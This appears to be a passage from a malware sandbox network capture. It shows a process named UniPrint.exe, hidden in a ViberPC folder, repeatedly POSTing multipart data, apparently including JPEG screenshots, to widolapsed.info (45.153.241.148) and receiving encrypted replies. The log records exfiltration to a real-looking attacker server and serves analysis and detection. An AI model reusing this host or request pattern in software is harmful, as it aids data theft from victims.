                                                                                                      2021-09-15 11:46:26 UTC1927OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:26 UTC1943OUTData Raw: 92 96 8a 00 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5 cd
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ
                                                                                                      2021-09-15 11:46:26 UTC1954OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 37 37 36 30 35 31 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3577760510--
                                                                                                      2021-09-15 11:46:27 UTC1954INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:26 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=5eaebc8002b5a3bf935beed88b34a9f53d14ee1f01378b1c6071a165192911fe; expires=Thu, 15-Sep-2022 11:46:26 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:27 UTC1954INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.34981345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:27 UTC1954OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76833
                                                                                                      Content-Type: multipart/form-data; boundary=--------4017631281
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:27 UTC1955OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 37 36 33 31 32 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4017631281Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:27 UTC1955OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 d9 d3 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:27 UTC1955OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:27 UTC1971OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:27 UTC1987OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:27 UTC2003OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:27 UTC2019OUTData Raw: 33 45 01 61 73 46 69 b9 a5 cd 17 0b 0b 9a 4c d2 66 93 34 5c 76 1d 9a 33 4d cd 19 a2 e1 61 d9 a5 cd 33 34 66 8b 85 87 66 8c d3 73 49 9a 2e 16 1d 9a 4c d2 66 93 34 ae 3b 0e cd 14 dc d1 9a 57 0b 0b 49 49 46 68 1d 82 8a 33 49 48 61 9a 4c d1 45 21 85 14 94 66 90 58 5a 29 33 49 9a 77 0b 0b 45 34 9a 4c d2 b9 56 1d 9a 29 b4 b9 a5 70 b0 b4 53 73 46 68 0b 12 0e 94 52 03 45 51 20 69 33 41 a6 d4 b6 52 42 e6 8a 4a 0d 17 00 a2 92 8a 43 1d 45 25 2d 31 15 69 68 a2 b1 36 0a 28 a2 80 0a 28 a2 80 0a 28 a4 a0 05 a2 8a 28 00 a2 8a 28 00 a2 8a 29 80 b4 52 51 40 0b 49 4b 45 00 25 14 51 40 05 14 51 40 0b 45 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01
                                                                                                      Data Ascii: 3EasFiLf4\v3Ma34ffsI.Lf4;WIIFh3IHaLE!fXZ)3IwE4LV)pSsFhREQ i3ARBJCE%-1ih6((((()RQ@IKE%Q@Q@E%Z-%PJ(h(`QE ((ZJ(h
                                                                                                      2021-09-15 11:46:27 UTC2030OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 37 36 33 31 32 38 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4017631281--
                                                                                                      2021-09-15 11:46:28 UTC2030INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:27 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=6583dead22c22515029b64a39588f30f5b577db3d99bb62ba98929bd98d2a199; expires=Thu, 15-Sep-2022 11:46:27 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:28 UTC2030INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.34981745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:29 UTC2030OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76635
                                                                                                      Content-Type: multipart/form-data; boundary=--------3576073818
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:29 UTC2030OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 36 30 37 33 38 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3576073818Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:29 UTC2030OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:29 UTC2030OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:29 UTC2046OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:29 UTC2062OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:29 UTC2078OUTData Raw: 46 e7 80 a4 fe 15 a2 75 2d 3e 3f f5 76 a4 fd 69 0e b8 17 fd 55 ac 63 eb 47 b4 a8 f6 88 7b 0a 6b 79 15 16 d2 76 e9 19 fc aa dd a6 9b 71 e6 86 28 7a d4 6d ae dd 1f ba 11 7e 82 98 9a ad e3 c8 b9 94 e0 9e c2 a6 4a b3 46 94 d5 08 c9 6e cb 9e 33 5d b0 da 83 e9 5c be 9f ff 00 21 1b 7f fa e8 b5 d3 78 c4 96 b6 b4 27 a9 5a e6 74 ff 00 f9 08 db ff 00 d7 41 fc e9 61 ff 00 80 75 d6 fe 31 e8 5a 8a 5b 99 83 4d 28 53 8e 95 48 cd a6 c7 d5 c9 aa de 24 24 5e ae 0f f0 d6 2f 5e f5 85 0a 1c d0 4d b2 71 38 ce 4a 8e 2a 27 40 75 3d 3d 3e e4 44 d3 0e b9 12 ff 00 ab b7 15 85 45 6e b0 b0 ea 72 3c 7d 5e 86 c3 6b f3 7f 04 6a 2a 07 d6 6e db a3 63 e9 59 d4 55 2c 3d 35 d0 c9 e2 eb 3e a5 b6 d4 2e 5f ef 4a df 9d 37 ce 91 ba b9 3f 8d 57 a7 2d 5f b3 8a d9 12 ab 4d ee c9 77 13 d4 9a 5c d3 45
                                                                                                      Data Ascii: Fu->?viUcG{kyvq(zm~JFn3]\!x'ZtAau1Z[M(SH$$^/^Mq8J*'@u==>DEnr<}^kj*ncYU,=5>._J7?W-_Mw\E
                                                                                                      2021-09-15 11:46:29 UTC2094OUTData Raw: 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5 cd 36 93 34 5c
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ64\
                                                                                                      2021-09-15 11:46:29 UTC2105OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 36 30 37 33 38 31 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3576073818--
                                                                                                      2021-09-15 11:46:29 UTC2105INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:29 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=3bf964a042be270a536051d0f612abbf134cc7dce1ec0c99752dc8740bbcc5de; expires=Thu, 15-Sep-2022 11:46:29 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:29 UTC2105INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.34981845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:30 UTC2105OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76584
                                                                                                      Content-Type: multipart/form-data; boundary=--------2060090614
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:30 UTC2106OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 36 30 30 39 30 36 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2060090614Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:30 UTC2106OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ea d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
